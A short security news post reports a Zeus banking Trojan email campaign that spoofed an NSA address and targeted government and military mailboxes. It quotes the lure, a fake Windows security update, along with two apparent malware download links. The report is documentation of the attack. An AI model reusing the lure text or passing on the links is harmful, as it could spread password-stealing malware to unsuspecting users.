Zeus Attack Spoofs NSA, Targets .gov and .mil

Criminals are spamming the Zeus banking Trojan in a convincing e-mail that 
spoofs the National Security Agency. Initial reports indicate that a large 
number of government systems may have been compromised by the attack.

According one state government security expert who received multiple copies of 
the message, the e-mail campaign — apparently designed to steal passwords from 
infected systems — was sent exclusively to government (.gov) and military 
(.mil) e-mail addresses.

The messages are spoofed so that they appear to have been sent by the National 
Intelligence Council (address used was n...@nsa.gov), which serves as the 
center for midterm and long-range strategic thinking for the U.S. intelligence 
community and reports to the office of the Director of National Intelligence.

Security Update for Windows 2000/XP/Vista/7 (KB823988)

About this download: A security issue has been identified that could allow an 
attacker to remotely compromise a computer running Microsoft® Windows® and gain 
complete control over it. You can help protect your computer by installing this 
update from Microsoft. After you install this item, you may have to restart 
your computer.

Download:

http://mv.net.md/update/update.zip

or

http://www.sendspace.com/file/7jmxtq

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Jeffrey Carr is the CEO of GreyLogic, the Founder and Principal Investigator of 
Project Grey Goose, and the author of “Inside Cyber Warfare”.
jeffr...@greylogic.us


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